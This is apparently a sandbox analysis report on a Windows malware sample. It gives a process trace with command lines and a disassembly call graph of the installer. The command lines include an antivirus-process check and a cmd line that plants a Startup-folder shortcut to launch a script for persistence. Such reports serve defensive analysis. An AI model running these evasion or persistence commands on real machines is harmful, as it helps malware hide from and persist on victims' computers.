                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                        Imagebase:0x120000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:03:38:29
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md 353685
                                                        Imagebase:0xa40000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:03:38:29
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /V "WirelessNeilAspBringing" Actively
                                                        Imagebase:0x120000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:03:38:29
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c copy /b ..\Skirts D
                                                        Imagebase:0xa40000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:03:38:29
                                                        Start date:15/10/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        Wow64 process (32bit):true
                                                        Commandline:Soldiers.pif D
                                                        Imagebase:0x8e0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 5%, ReversingLabs
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:03:38:29
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:choice /d y /t 5
                                                        Imagebase:0xba0000
                                                        File size:28'160 bytes
                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:03:38:31
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & exit
                                                        Imagebase:0xa40000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:03:38:31
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:03:38:43
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js"
                                                        Imagebase:0x7ff66def0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:03:38:43
                                                        Start date:15/10/2024
                                                        Path:C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" "C:\Users\user\AppData\Local\DesignQuantum Innovations\q"
                                                        Imagebase:0x9a0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 5%, ReversingLabs
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:03:39:21
                                                        Start date:15/10/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        Imagebase:0x8e0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:23
                                                        Start time:03:39:38
                                                        Start date:15/10/2024
                                                        Path:C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr"
                                                        Imagebase:0x9a0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:34.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.9%
                                                          Total number of Nodes:593
                                                          Total number of Limit Nodes:9
                                                          execution_graph 1403 403899 #17 SetErrorMode OleInitialize 1477 406312 GetModuleHandleA 1403->1477 1407 403907 GetCommandLineW 1482 40601f lstrcpynW 1407->1482 1409 403919 GetModuleHandleW 1410 403931 1409->1410 1483 405d1c 1410->1483 1413 4039ec 1414 403a0b GetTempPathW 1413->1414 1487 4037e2 1414->1487 1416 403a21 1417 403a25 GetWindowsDirectoryW lstrcatW 1416->1417 1418 403a49 DeleteFileW 1416->1418 1420 4037e2 11 API calls 1417->1420 1495 40359d GetTickCount GetModuleFileNameW 1418->1495 1419 405d1c CharNextW 1424 403952 1419->1424 1422 403a41 1420->1422 1422->1418 1425 403ae2 1422->1425 1423 403a5d 1423->1425 1427 403ac7 1423->1427 1429 405d1c CharNextW 1423->1429 1424->1413 1424->1419 1433 4039ee 1424->1433 1580 40386f 1425->1580 1523 405942 1427->1523 1444 403a74 1429->1444 1431 403be4 1435 403c67 1431->1435 1438 406312 3 API calls 1431->1438 1432 403af7 1587 405cb6 1432->1587 1591 40601f lstrcpynW 1433->1591 1434 403ad7 1608 4060fd 1434->1608 1441 403bf3 1438->1441 1445 406312 3 API calls 1441->1445 1442 403b0d lstrcatW lstrcmpiW 1442->1425 1447 403b29 CreateDirectoryW SetCurrentDirectoryW 1442->1447 1443 403a9f 1592 406794 1443->1592 1444->1442 1444->1443 1448 403bfc 1445->1448 1450 403b41 1447->1450 1451 403b4c 1447->1451 1452 406312 3 API calls 1448->1452 1621 40601f lstrcpynW 1450->1621 1622 40601f lstrcpynW 1451->1622 1455 403c05 1452->1455 1458 403c53 ExitWindowsEx 1455->1458 1464 403c13 GetCurrentProcess 1455->1464 1457 403b5a 1623 40601f lstrcpynW 1457->1623 1458->1435 1461 403c60 1458->1461 1459 403abc 1607 40601f lstrcpynW 1459->1607 1651 40141d 1461->1651 1467 403c23 1464->1467 1467->1458 1468 403b8f CopyFileW 1472 403b69 1468->1472 1469 403bd8 1471 406c7e 42 API calls 1469->1471 1473 403bdf 1471->1473 1472->1469 1474 40681b 18 API calls 1472->1474 1476 403bc3 CloseHandle 1472->1476 1624 40681b 1472->1624 1643 406c7e 1472->1643 1648 405c55 CreateProcessW 1472->1648 1473->1425 1474->1472 1476->1472 1478 406335 GetProcAddress 1477->1478 1479 40632a LoadLibraryA 1477->1479 1480 4038dc SHGetFileInfoW 1478->1480 1479->1478 1479->1480 1481 40601f lstrcpynW 1480->1481 1481->1407 1482->1409 1484 405d22 1483->1484 1485 403940 CharNextW 1484->1485 1486 405d29 CharNextW 1484->1486 1485->1424 1486->1484 1654 40604e 1487->1654 1489 4037f8 1489->1416 1490 4037ee 1490->1489 1663 406738 lstrlenW CharPrevW 1490->1663 1670 405e66 GetFileAttributesW CreateFileW 1495->1670 1497 4035dd 1522 4035ed 1497->1522 1671 40601f lstrcpynW 1497->1671 1499 403603 1672 406767 lstrlenW 1499->1672 1503 403614 GetFileSize 1518 403710 1503->1518 1521 40362b 1503->1521 1505 403719 1507 403755 GlobalAlloc 1505->1507 1505->1522 1713 403368 SetFilePointer 1505->1713 1690 403368 SetFilePointer 1507->1690 1509 4037d3 1512 4032d2 6 API calls 1509->1512 1511 403736 1514 403336 ReadFile 1511->1514 1512->1522 1513 403770 1691 40337f 1513->1691 1516 403741 1514->1516 1516->1507 1516->1522 1517 4032d2 6 API calls 1517->1521 1679 4032d2 1518->1679 1519 40377c 1519->1519 1520 4037aa SetFilePointer 1519->1520 1519->1522 1520->1522 1521->1509 1521->1517 1521->1518 1521->1522 1677 403336 ReadFile 1521->1677 1522->1423 1524 406312 3 API calls 1523->1524 1525 405956 1524->1525 1526 40595c 1525->1526 1527 40596e 1525->1527 1739 405f67 wsprintfW 1526->1739 1740 405ee9 RegOpenKeyExW 1527->1740 1531 4059be lstrcatW 1532 40596c 1531->1532 1730 403eab 1532->1730 1533 405ee9 3 API calls 1533->1531 1536 406794 18 API calls 1537 4059f0 1536->1537 1538 405a86 1537->1538 1540 405ee9 3 API calls 1537->1540 1539 406794 18 API calls 1538->1539 1541 405a8c 1539->1541 1542 405a22 1540->1542 1543 405a9c 1541->1543 1544 40681b 18 API calls 1541->1544 1542->1538 1546 405a45 lstrlenW 1542->1546 1552 405d1c CharNextW 1542->1552 1545 405abc LoadImageW 1543->1545 1746 403e8a 1543->1746 1544->1543 1547 405ae7 RegisterClassW 1545->1547 1548 405b7c 1545->1548 1553 405a53 lstrcmpiW 1546->1553 1554 405a79 1546->1554 1549 405b86 1547->1549 1550 405b2f SystemParametersInfoW CreateWindowExW 1547->1550 1551 40141d 80 API calls 1548->1551 1549->1434 1550->1548 1557 405b82 1551->1557 1558 405a40 1552->1558 1553->1554 1559 405a63 GetFileAttributesW 1553->1559 1556 406738 3 API calls 1554->1556 1561 405a7f 1556->1561 1557->1549 1564 403eab 19 API calls 1557->1564 1558->1546 1562 405a6f 1559->1562 1560 405ab2 1560->1545 1745 40601f lstrcpynW 1561->1745 1562->1554 1565 406767 2 API calls 1562->1565 1566 405b93 1564->1566 1565->1554 1567 405c22 1566->1567 1568 405b9f ShowWindow LoadLibraryW 1566->1568 1751 40505d OleInitialize 1567->1751 1570 405bc5 GetClassInfoW 1568->1570 1571 405bbe LoadLibraryW 1568->1571 1573 405bd9 GetClassInfoW RegisterClassW 1570->1573 1574 405bef DialogBoxParamW 1570->1574 1571->1570 1572 405c28 1575 405c44 1572->1575 1576 405c2c 1572->1576 1573->1574 1577 40141d 80 API calls 1574->1577 1578 40141d 80 API calls 1575->1578 1576->1549 1579 40141d 80 API calls 1576->1579 1577->1549 1578->1549 1579->1549 1581 403887 1580->1581 1582 403879 CloseHandle 1580->1582 1899 403c99 1581->1899 1582->1581 1588 405ccb 1587->1588 1589 403b05 ExitProcess 1588->1589 1590 405ce1 MessageBoxIndirectW 1588->1590 1590->1589 1591->1414 1956 40601f lstrcpynW 1592->1956 1594 4067a5 1595 405d6f 4 API calls 1594->1595 1596 4067ab 1595->1596 1597 40604e 5 API calls 1596->1597 1604 403aad 1596->1604 1603 4067bb 1597->1603 1598 4067f3 lstrlenW 1599 4067fa 1598->1599 1598->1603 1601 406738 3 API calls 1599->1601 1600 4062eb 2 API calls 1600->1603 1602 406800 GetFileAttributesW 1601->1602 1602->1604 1603->1598 1603->1600 1603->1604 1605 406767 2 API calls 1603->1605 1604->1425 1606 40601f lstrcpynW 1604->1606 1605->1598 1606->1459 1607->1427 1609 406126 1608->1609 1610 406109 1608->1610 1612 40611a 1609->1612 1613 406143 1609->1613 1614 40619d 1609->1614 1611 406113 CloseHandle 1610->1611 1610->1612 1611->1612 1612->1425 1615 4061a6 lstrcatW lstrlenW WriteFile 1613->1615 1616 40614c GetFileAttributesW 1613->1616 1614->1612 1614->1615 1615->1612 1957 405e66 GetFileAttributesW CreateFileW 1616->1957 1618 406168 1618->1612 1619 406192 SetFilePointer 1618->1619 1620 406178 WriteFile 1618->1620 1619->1614 1620->1619 1621->1451 1622->1457 1623->1472 1633 406828 1624->1633 1625 406a95 1626 403b82 DeleteFileW 1625->1626 1960 40601f lstrcpynW 1625->1960 1626->1468 1626->1472 1628 4068e9 GetVersion 1638 4068f6 1628->1638 1629 406a5c lstrlenW 1629->1633 1630 40681b 10 API calls 1630->1629 1633->1625 1633->1628 1633->1629 1633->1630 1636 40604e 5 API calls 1633->1636 1958 405f67 wsprintfW 1633->1958 1959 40601f lstrcpynW 1633->1959 1634 405ee9 3 API calls 1634->1638 1635 406968 GetSystemDirectoryW 1635->1638 1636->1633 1637 40697b GetWindowsDirectoryW 1637->1638 1638->1633 1638->1634 1638->1635 1638->1637 1639 40681b 10 API calls 1638->1639 1640 4069f5 lstrcatW 1638->1640 1641 4069af SHGetSpecialFolderLocation 1638->1641 1639->1638 1640->1633 1641->1638 1642 4069c7 SHGetPathFromIDListW CoTaskMemFree 1641->1642 1642->1638 1644 406312 3 API calls 1643->1644 1646 406c85 1644->1646 1647 406ca6 1646->1647 1961 406aaf lstrcpyW 1646->1961 1647->1472 1649 405c90 1648->1649 1650 405c84 CloseHandle 1648->1650 1649->1472 1650->1649 1652 40139d 80 API calls 1651->1652 1653 401432 1652->1653 1653->1435 1660 40605b 1654->1660 1655 4060d1 1656 4060d7 CharPrevW 1655->1656 1658 4060f7 1655->1658 1656->1655 1657 4060c4 CharNextW 1657->1655 1657->1660 1658->1490 1659 405d1c CharNextW 1659->1660 1660->1655 1660->1657 1660->1659 1661 4060b0 CharNextW 1660->1661 1662 4060bf CharNextW 1660->1662 1661->1660 1662->1657 1664 403800 CreateDirectoryW 1663->1664 1665 406755 lstrcatW 1663->1665 1666 405e95 1664->1666 1665->1664 1667 405ea2 GetTickCount GetTempFileNameW 1666->1667 1668 403814 1667->1668 1669 405ed8 1667->1669 1668->1416 1669->1667 1669->1668 1670->1497 1671->1499 1673 406776 1672->1673 1674 403609 1673->1674 1675 40677c CharPrevW 1673->1675 1676 40601f lstrcpynW 1674->1676 1675->1673 1675->1674 1676->1503 1678 403357 1677->1678 1678->1521 1680 4032f3 1679->1680 1681 4032db 1679->1681 1684 403303 GetTickCount 1680->1684 1685 4032fb 1680->1685 1682 4032e4 DestroyWindow 1681->1682 1683 4032eb 1681->1683 1682->1683 1683->1505 1687 403311 CreateDialogParamW ShowWindow 1684->1687 1688 403334 1684->1688 1714 406348 1685->1714 1687->1688 1688->1505 1690->1513 1692 40339a 1691->1692 1693 4033c7 1692->1693 1729 403368 SetFilePointer 1692->1729 1695 403336 ReadFile 1693->1695 1696 4033d2 1695->1696 1697 403529 1696->1697 1698 4033eb GetTickCount 1696->1698 1705 4033d6 1696->1705 1699 403579 1697->1699 1703 40352d 1697->1703 1698->1705 1710 403414 1698->1710 1700 403336 ReadFile 1699->1700 1700->1705 1701 403336 ReadFile 1701->1710 1702 403336 ReadFile 1702->1703 1703->1702 1704 403551 WriteFile 1703->1704 1703->1705 1704->1705 1706 403566 1704->1706 1705->1519 1706->1703 1706->1705 1707 403577 1706->1707 1707->1705 1708 403466 GetTickCount 1708->1710 1709 40348f MulDiv wsprintfW 1718 404f88 1709->1718 1710->1701 1710->1705 1710->1708 1710->1709 1712 4034d3 WriteFile 1710->1712 1712->1705 1712->1710 1713->1511 1715 406365 PeekMessageW 1714->1715 1716 403301 1715->1716 1717 40635b DispatchMessageW 1715->1717 1716->1505 1717->1715 1719 404fa1 1718->1719 1724 405045 1718->1724 1720 404fbf lstrlenW 1719->1720 1721 40681b 18 API calls 1719->1721 1722 404fe8 1720->1722 1723 404fcd lstrlenW 1720->1723 1721->1720 1726 404ffb 1722->1726 1727 404fee SetWindowTextW 1722->1727 1723->1724 1725 404fdf lstrcatW 1723->1725 1724->1710 1725->1722 1726->1724 1728 405001 SendMessageW SendMessageW SendMessageW 1726->1728 1727->1726 1728->1724 1729->1693 1731 403ebf 1730->1731 1759 405f67 wsprintfW 1731->1759 1733 403f33 1734 40681b 18 API calls 1733->1734 1735 403f3f SetWindowTextW 1734->1735 1736 403f5a 1735->1736 1737 403f75 1736->1737 1738 40681b 18 API calls 1736->1738 1737->1536 1738->1736 1739->1532 1741 40599f 1740->1741 1742 405f1d RegQueryValueExW 1740->1742 1741->1531 1741->1533 1743 405f3f RegCloseKey 1742->1743 1743->1741 1745->1538 1760 40601f lstrcpynW 1746->1760 1748 403e9e 1749 406738 3 API calls 1748->1749 1750 403ea4 lstrcatW 1749->1750 1750->1560 1761 403dc5 1751->1761 1753 403dc5 SendMessageW 1754 4050bb OleUninitialize 1753->1754 1754->1572 1755 4062b9 11 API calls 1756 405080 1755->1756 1756->1755 1758 4050ab 1756->1758 1764 40139d 1756->1764 1758->1753 1759->1733 1760->1748 1762 403ddd 1761->1762 1763 403dce SendMessageW 1761->1763 1762->1756 1763->1762 1767 4013a4 1764->1767 1765 401410 1765->1756 1767->1765 1768 4013dd MulDiv SendMessageW 1767->1768 1769 4015a0 1767->1769 1768->1767 1770 4015fa 1769->1770 1847 40160c 1769->1847 1771 401601 1770->1771 1772 401742 1770->1772 1773 401962 1770->1773 1774 4019ca 1770->1774 1775 40176e 1770->1775 1776 401650 1770->1776 1777 4017b1 1770->1777 1778 401672 1770->1778 1779 401693 1770->1779 1780 401616 1770->1780 1781 4016d6 1770->1781 1782 401736 1770->1782 1783 401897 1770->1783 1784 4018db 1770->1784 1785 40163c 1770->1785 1786 4016bd 1770->1786 1770->1847 1787 4062b9 11 API calls 1771->1787 1793 401751 ShowWindow 1772->1793 1794 401758 1772->1794 1798 40145c 18 API calls 1773->1798 1791 40145c 18 API calls 1774->1791 1795 40145c 18 API calls 1775->1795 1816 4062b9 11 API calls 1776->1816 1882 40145c 1777->1882 1796 40145c 18 API calls 1778->1796 1876 401446 1779->1876 1790 40145c 18 API calls 1780->1790 1805 401446 18 API calls 1781->1805 1781->1847 1898 405f67 wsprintfW 1782->1898 1797 40145c 18 API calls 1783->1797 1788 40145c 18 API calls 1784->1788 1792 401647 PostQuitMessage 1785->1792 1785->1847 1789 4062b9 11 API calls 1786->1789 1787->1847 1801 4018e2 1788->1801 1802 4016c7 SetForegroundWindow 1789->1802 1803 40161c 1790->1803 1804 4019d1 SearchPathW 1791->1804 1792->1847 1793->1794 1807 401765 ShowWindow 1794->1807 1794->1847 1808 401775 1795->1808 1809 401678 1796->1809 1810 40189d 1797->1810 1811 401968 GetFullPathNameW 1798->1811 1814 40145c 18 API calls 1801->1814 1802->1847 1815 4062b9 11 API calls 1803->1815 1804->1847 1805->1847 1807->1847 1817 4062b9 11 API calls 1808->1817 1818 4062b9 11 API calls 1809->1818 1894 4062eb FindFirstFileW 1810->1894 1827 40197f 1811->1827 1858 4019a1 1811->1858 1813 40169a 1879 4062b9 lstrlenW wvsprintfW 1813->1879 1822 4018eb 1814->1822 1823 401627 1815->1823 1824 401664 1816->1824 1825 401785 SetFileAttributesW 1817->1825 1836 401683 1818->1836 1820 4062b9 11 API calls 1828 4017c9 1820->1828 1832 40145c 18 API calls 1822->1832 1833 404f88 25 API calls 1823->1833 1834 40139d 65 API calls 1824->1834 1835 40179a 1825->1835 1825->1847 1844 4062eb 2 API calls 1827->1844 1827->1858 1887 405d6f CharNextW CharNextW 1828->1887 1831 4019b8 GetShortPathNameW 1831->1847 1840 4018f5 1832->1840 1833->1847 1834->1847 1841 4062b9 11 API calls 1835->1841 1842 404f88 25 API calls 1836->1842 1837 4018c2 1845 4062b9 11 API calls 1837->1845 1838 4018a9 1843 4062b9 11 API calls 1838->1843 1846 4062b9 11 API calls 1840->1846 1841->1847 1842->1847 1843->1847 1848 401991 1844->1848 1845->1847 1851 401902 MoveFileW 1846->1851 1847->1767 1848->1858 1897 40601f lstrcpynW 1848->1897 1849 401864 1849->1836 1852 40186e 1849->1852 1850 405d1c CharNextW 1854 4017e6 CreateDirectoryW 1850->1854 1855 401912 1851->1855 1856 40191e 1851->1856 1857 404f88 25 API calls 1852->1857 1859 4017fe GetLastError 1854->1859 1871 4017d4 1854->1871 1855->1836 1860 401942 1856->1860 1865 4062eb 2 API calls 1856->1865 1861 401875 1857->1861 1858->1831 1858->1847 1862 401827 GetFileAttributesW 1859->1862 1863 40180b GetLastError 1859->1863 1870 4062b9 11 API calls 1860->1870 1893 40601f lstrcpynW 1861->1893 1862->1871 1867 4062b9 11 API calls 1863->1867 1864 4062b9 11 API calls 1864->1871 1868 401929 1865->1868 1867->1871 1868->1860 1873 406c7e 42 API calls 1868->1873 1869 401882 SetCurrentDirectoryW 1869->1847 1872 40195c 1870->1872 1871->1849 1871->1850 1871->1864 1872->1847 1874 401936 1873->1874 1875 404f88 25 API calls 1874->1875 1875->1860 1877 40681b 18 API calls 1876->1877 1878 401455 1877->1878 1878->1813 1880 4060fd 9 API calls 1879->1880 1881 4016a7 Sleep 1880->1881 1881->1847 1883 40681b 18 API calls 1882->1883 1884 401488 1883->1884 1885 401497 1884->1885 1886 40604e 5 API calls 1884->1886 1885->1820 1886->1885 1888 405d8c 1887->1888 1891 405d9e 1887->1891 1890 405d99 CharNextW 1888->1890 1888->1891 1889 405dc2 1889->1871 1890->1889 1891->1889 1892 405d1c CharNextW 1891->1892 1892->1891 1893->1869 1895 406301 FindClose 1894->1895 1896 4018a5 1894->1896 1895->1896 1896->1837 1896->1838 1897->1858 1898->1847 1900 403ca7 1899->1900 1901 40388c 1900->1901 1902 403cac FreeLibrary GlobalFree 1900->1902 1903 406cb1 1901->1903 1902->1901 1902->1902 1904 406794 18 API calls 1903->1904 1905 406cc4 1904->1905 1906 406ce4 1905->1906 1907 406ccd DeleteFileW 1905->1907 1909 406e61 1906->1909 1954 40601f lstrcpynW 1906->1954 1908 403898 CoUninitialize 1907->1908 1908->1431 1908->1432 1909->1908 1912 406e6e 1909->1912 1916 4062eb 2 API calls 1909->1916 1911 406d0f 1913 406d23 1911->1913 1914 406d19 lstrcatW 1911->1914 1921 4062b9 11 API calls 1912->1921 1917 406767 2 API calls 1913->1917 1915 406d29 1914->1915 1919 406d39 lstrcatW 1915->1919 1920 406d2f 1915->1920 1918 406e7a 1916->1918 1917->1915 1918->1908 1923 406738 3 API calls 1918->1923 1922 406d41 lstrlenW FindFirstFileW 1919->1922 1920->1919 1920->1922 1921->1908 1924 406e51 1922->1924 1936 406d68 1922->1936 1925 406e84 1923->1925 1924->1909 1927 4062b9 11 API calls 1925->1927 1926 405d1c CharNextW 1926->1936 1928 406e8f 1927->1928 1951 405e46 GetFileAttributesW 1928->1951 1932 406e2e FindNextFileW 1933 406e46 FindClose 1932->1933 1932->1936 1933->1924 1934 406ea3 1934->1912 1938 406ea9 1934->1938 1935 406eda 1937 404f88 25 API calls 1935->1937 1936->1926 1936->1932 1939 4062b9 11 API calls 1936->1939 1941 406cb1 72 API calls 1936->1941 1943 405e46 2 API calls 1936->1943 1948 404f88 25 API calls 1936->1948 1949 404f88 25 API calls 1936->1949 1950 406c7e 42 API calls 1936->1950 1955 40601f lstrcpynW 1936->1955 1937->1908 1940 4062b9 11 API calls 1938->1940 1939->1936 1942 406eb3 1940->1942 1941->1936 1944 404f88 25 API calls 1942->1944 1946 406de4 DeleteFileW 1943->1946 1945 406ebd 1944->1945 1947 406c7e 42 API calls 1945->1947 1946->1936 1947->1908 1948->1932 1949->1936 1950->1936 1952 405e63 RemoveDirectoryW 1951->1952 1953 405e55 SetFileAttributesW 1951->1953 1952->1934 1952->1935 1953->1952 1954->1911 1955->1936 1956->1594 1957->1618 1958->1633 1959->1633 1960->1626 1962 406ad4 1961->1962 1963 406afd GetShortPathNameW 1961->1963 1987 405e66 GetFileAttributesW CreateFileW 1962->1987 1965 406b16 1963->1965 1966 406c78 1963->1966 1965->1966 1968 406b1e WideCharToMultiByte 1965->1968 1966->1647 1967 406add CloseHandle GetShortPathNameW 1967->1966 1969 406af5 1967->1969 1968->1966 1970 406b3b WideCharToMultiByte 1968->1970 1969->1963 1969->1966 1970->1966 1971 406b53 wsprintfA 1970->1971 1972 40681b 18 API calls 1971->1972 1973 406b7f 1972->1973 1988 405e66 GetFileAttributesW CreateFileW 1973->1988 1975 406b8c 1975->1966 1976 406b99 GetFileSize GlobalAlloc 1975->1976 1977 406bba ReadFile 1976->1977 1978 406c6e CloseHandle 1976->1978 1977->1978 1979 406bd4 1977->1979 1978->1966 1979->1978 1989 405dcc lstrlenA 1979->1989 1982 406c01 1984 405dcc 4 API calls 1982->1984 1983 406bed lstrcpyA 1985 406c0f 1983->1985 1984->1985 1986 406c46 SetFilePointer WriteFile GlobalFree 1985->1986 1986->1978 1987->1967 1988->1975 1990 405e0d lstrlenA 1989->1990 1991 405de6 lstrcmpiA 1990->1991 1992 405e15 1990->1992 1991->1992 1993 405e04 CharNextA 1991->1993 1992->1982 1992->1983 1993->1990 2087 40324c 2088 403277 2087->2088 2089 40325e SetTimer 2087->2089 2090 4032cc 2088->2090 2091 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 2088->2091 2089->2088 2091->2090 1994 40548f 1995 4055e3 1994->1995 1996 4054a7 1994->1996 1998 4055f4 GetDlgItem GetDlgItem 1995->1998 2013 405634 1995->2013 1996->1995 1997 4054b3 1996->1997 1999 4054d1 1997->1999 2000 4054be SetWindowPos 1997->2000 2001 403d55 19 API calls 1998->2001 2004 4054d6 ShowWindow 1999->2004 2005 4054ee 1999->2005 2000->1999 2006 40561e SetClassLongW 2001->2006 2002 40568e 2003 403dc5 SendMessageW 2002->2003 2008 4055de 2002->2008 2032 4056a0 2003->2032 2004->2005 2009 405510 2005->2009 2010 4054f6 DestroyWindow 2005->2010 2011 40141d 80 API calls 2006->2011 2007 40139d 80 API calls 2016 405666 2007->2016 2014 405515 SetWindowLongW 2009->2014 2015 405526 2009->2015 2012 4058f2 2010->2012 2011->2013 2012->2008 2025 405923 ShowWindow 2012->2025 2013->2002 2013->2007 2014->2008 2017 405532 GetDlgItem 2015->2017 2018 4055cf 2015->2018 2016->2002 2019 40566a SendMessageW 2016->2019 2022 405562 2017->2022 2023 405545 SendMessageW IsWindowEnabled 2017->2023 2073 403de0 2018->2073 2019->2008 2020 40141d 80 API calls 2020->2032 2021 4058f4 DestroyWindow KiUserCallbackDispatcher 2021->2012 2027 40556f 2022->2027 2029 4055b6 SendMessageW 2022->2029 2030 405582 2022->2030 2039 405567 2022->2039 2023->2008 2023->2022 2025->2008 2026 40681b 18 API calls 2026->2032 2027->2029 2027->2039 2029->2018 2033 40558a 2030->2033 2034 40559f 2030->2034 2031 40559d 2031->2018 2032->2008 2032->2020 2032->2021 2032->2026 2035 403d55 19 API calls 2032->2035 2055 405834 DestroyWindow 2032->2055 2064 403d55 2032->2064 2037 40141d 80 API calls 2033->2037 2036 40141d 80 API calls 2034->2036 2035->2032 2038 4055a6 2036->2038 2037->2039 2038->2018 2038->2039 2070 403d2e 2039->2070 2041 40571b GetDlgItem 2042 405730 2041->2042 2043 405739 ShowWindow KiUserCallbackDispatcher 2041->2043 2042->2043 2067 403d9b KiUserCallbackDispatcher 2043->2067 2045 405763 EnableWindow 2048 405777 2045->2048 2046 40577c GetSystemMenu EnableMenuItem SendMessageW 2047 4057ac SendMessageW 2046->2047 2046->2048 2047->2048 2048->2046 2068 403dae SendMessageW 2048->2068 2069 40601f lstrcpynW 2048->2069 2051 4057da lstrlenW 2052 40681b 18 API calls 2051->2052 2053 4057f0 SetWindowTextW 2052->2053 2054 40139d 80 API calls 2053->2054 2054->2032 2055->2012 2056 40584e CreateDialogParamW 2055->2056 2056->2012 2057 405881 2056->2057 2058 403d55 19 API calls 2057->2058 2059 40588c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2058->2059 2060 40139d 80 API calls 2059->2060 2061 4058d2 2060->2061 2061->2008 2062 4058da ShowWindow 2061->2062 2063 403dc5 SendMessageW 2062->2063 2063->2012 2065 40681b 18 API calls 2064->2065 2066 403d60 SetDlgItemTextW 